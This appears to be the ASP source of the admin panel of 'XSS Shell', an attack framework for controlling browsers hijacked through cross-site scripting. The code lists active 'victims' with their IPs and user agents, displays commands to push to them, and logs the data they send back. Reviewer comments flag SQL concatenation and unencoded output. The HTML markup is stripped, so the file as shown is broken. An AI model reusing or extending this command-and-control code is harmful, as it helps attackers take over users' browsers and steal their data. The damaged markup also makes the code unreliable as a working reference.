<%
' Change log as kept by the author (restored one entry per line).
'09/08/2006
' - Started
'
' 15/08/2006
' - Working alpha
'
'18/08/2006
' New UI
'
'31/10/2006
' Now supports activity and shows active zombies and drops non-active ones
' Multiple victim support with send and save
' Faster victim notification
'01.04.2007
' - Logs replaced AttackID for XSS Tunnel compatibility
' TODO;
' - Log commands locally for analyze later
' + Build up connection interface
' - Command Shell
' / Command Interface
' + Implement AJAX for interface (low pr)
%>
<%
' Admin page entry point. protected() runs before anything is written;
' presumably the access check for this page — confirm in its definition,
' which is outside this file view.
protected()

Dim CallType
' "c" selects which fragment a polling request wants (see the Select Case).
' fm_Qnstr presumably reads the query string; whether it returns a number
' (so the numeric Case labels and the > 0 test below match) is not visible
' here — TODO confirm.
CallType = fm_Qnstr("c") 'Call only logs
Select Case CallType
    Case 1
        ' Recent log rows only.
        Call Logs()
    Case 2
        ' Active victim list, fully rendered.
        Call Victims(False)
    Case 3 ' XSS Tunnel
        ' First row's VictimID only (highest Victim.ID), for the tunnel client.
        Call Victims(True)
End Select

'// Poor man's AJAX Calls
' A fragment request ends the response here; only the full page render
' (no/zero "c") continues past this point.
If CallType > 0 Then Response.End

' Presumably consumed by a shared layout include — not visible in this file.
Title = "XSS Shell Admin"
%>
<% Call ShowCommands() %>
<%
' Initial (non-polled) render of the active victim list; the c=2 fragment
' request re-renders the same content via the dispatcher above.
Victims(False)
%>

Logs

<%
' Offline content viewer box (Sub defined further down).
Call Viewer()

'---------------------------------------------------------------------------
' Helpers
'---------------------------------------------------------------------------

' Lists victims whose lastseen is within the last Activity seconds, newest
' first (ORDER BY Victim.ID DESC), at most MAX_VICTIM rows.
' XSSTunnel = True : writes only the first row's VictimID (NO_RECORD when the
'                    query is empty) and ends the response.
' XSSTunnel = False: writes one entry per row via PrintVictim, then "[" followed
'                    by the comma-separated encoded VictimIDs.
' MAX_VICTIM, Activity, NO_RECORD, getRs, fmKill and fm_Encode are defined
' outside this file view.
Sub Victims(ByVal XSSTunnel)
    Dim RsVic
    ' The SELECT is built by concatenation; this is only safe if MAX_VICTIM and
    ' Activity are numeric constants/config values and never request-controlled
    ' — TODO confirm where they are set.
    getRs RsVic, "SELECT TOP " & MAX_VICTIM & " Victim.IP, Victim.ID, Victim.VictimID, RequestTime, RawUserAgent, Data FROM Victim, VictimDetail WHERE VictimDetail.VictimID = Victim.VictimID AND lastseen > DATEADD(""s"",-" & Activity & ",Now) ORDER BY Victim.ID DESC"
    If XSSTunnel Then
        If Not RsVic.EOF And Not RsVic.BOF Then
            Response.Write fm_Encode(RsVic("VictimId"))
        Else
            Response.Write NO_RECORD
        End IF
        ' Response.End returns here, so RsVic never reaches fmKill on this path.
        Response.End
    End If
    ' NOTE(review): the markup inside the string literals in this copy appears
    ' to have been stripped; only the text and the embedded line breaks remain.
    Response.Write "

Victims

"
    Dim viclist, Starter
    ' Starter is Empty (False) on the first pass, so no leading comma is written.
    While Not RsVic.EOF
        PrintVictim(RsVic)
        If Starter Then viclist = viclist & ","
        viclist = viclist & fm_Encode(RsVic("VictimID"))
        Starter = True
        RsVic.MoveNext
    Wend
    Response.Write "[" & viclist
    fmKill RsVic
End Sub

' Writes one victim entry as "IP / VictimID". Also assembles Data (encoded
' VictimID, encoded RawUserAgent and, when present, the proxy Data with
' DATA_SEPERATOR replaced by a line break) but in this copy never writes it —
' the commented-out Response.Write at the end looks like the original sink;
' confirm against the unstripped source.
' Rs("IP") is written without fm_Encode, unlike every other field here; if the
' stored IP can be influenced by request data it should be encoded the same way.
Sub PrintVictim(ByVal Rs)
    Dim Data, ProxyData
    ProxyData = Rs("Data")
    If ProxyData <> "" Then ProxyData = Replace(ProxyData, DATA_SEPERATOR, "
")
    Data = Data & "Victim ID : " & fm_Encode(Rs("VictimID")) & "
"
    Data = Data & "
" & fm_Encode(Rs("RawUserAgent")) & "
"
    If ProxyData <> "" Then Data = Data & "
" & ProxyData & "
"
    Dim Checked
    ' Assigned but never read in this copy.
    Checked = false
    With Response
        .Write "
"
        .Write " "
        .Write Rs("IP") & " / " & fm_Encode(Rs("VictimID")) & "
"
    End With
    'Response.Write ""
End Sub

' COMMANDS BOX
'---------------------------------------------------------------------------
' Show Available Commands
' Walks the Commands array (defined elsewhere) three elements per entry:
' element i is written through fm_Encode, element i+2 is written raw, i+1 is
' not used here. Raw output of Commands(i+2) is acceptable only if the array is
' a static, trusted table — TODO confirm.
Sub ShowCommands() %>

Commands

<%
    Dim i
    For i = 0 To UBound(Commands) Step 3
        Response.Write "
" & fm_Encode(Commands(i)) & "
" & Commands(i+2) & "
"
    Next
%>
Parameters :

<% End Sub

' VIEWER BOX
'---------------------------------------------------------------------------
' Offline Content Viewer iframe
' Static box; only the heading text survives in this copy (the iframe markup
' presumably stripped).
Sub Viewer() %>

Viewer

<% End Sub

' LOGS BOX
'---------------------------------------------------------------------------
' Show recent logs from victims
' Reads the newest DEFAULT_REC rows of Log (ORDER BY ID DESC) and prints each
' through PrintLog. DEFAULT_REC is defined outside this file view; it is
' concatenated into the SQL, so it must never be request-controlled.
Sub Logs()
    Dim RsLog
    getRs RsLog, "SELECT TOP " & DEFAULT_REC & " ID, Data, Type, AttackID, Shown FROM Log ORDER BY ID DESC"
    ' NOTE(review): the next statement appears to have been one commented-out
    ' heading write ("Logs : mm:ss") before the markup in this copy was
    ' stripped; the fragments after the first line break are left exactly as
    ' found rather than guessed at.
    ' Response.Write "

Logs : " & Minute(Now) & ":" & Second(Now) & "

"
    Response.Write "
    "
    While Not RsLog.EOF
        PrintLog(RsLog)
        RsLog.MoveNext
    Wend
    Response.Write "
"
    fmKill RsLog
End Sub

' Print and Format Logs
' Formats one Log row. When Data is present it goes through fm_Encode and the
' encoded "{n}" marker (%7Bn%7D) becomes a line break; otherwise AttackID & "..."
' is shown. CSSname is computed ("pushed" when Shown = 1, "done" when Data is
' present) but not used by the remaining output in this copy (the markup
' around Value was stripped). HTMLPAGE is defined elsewhere.
' Rs("AttackID") reaches the output unencoded on two paths (empty Data, and
' Type = HTMLPAGE), unlike Data which is encoded.
' Replace(Value, "%3Atrue", "%3Atrue") replaces a token with itself and is a
' no-op as written.
Function PrintLog(ByVal Rs)
    Dim Value
    If Rs("Data") <> "" Then
        Value = fm_Encode(Rs("Data"))
        Value = Replace(Value, "%7Bn%7D", "
")
        Value = Replace(Value, "%3Atrue", "%3Atrue")
    Else
        Value = Rs("AttackID") & "..."
    End If
    Dim CSSname
    '// Pushed
    If Rs("Shown") = 1 Then
        CSSname = "pushed"
    End If
    If Rs("Data") <> "" Then
        CSSname = "done"
    End If
    Value = "" & Value & ""
    If Rs("Type") = HTMLPAGE Then
        Value = "HTML - " & Rs("AttackID")
    End If
    Response.Write "
  • " & Value & "
  • "
End Function %>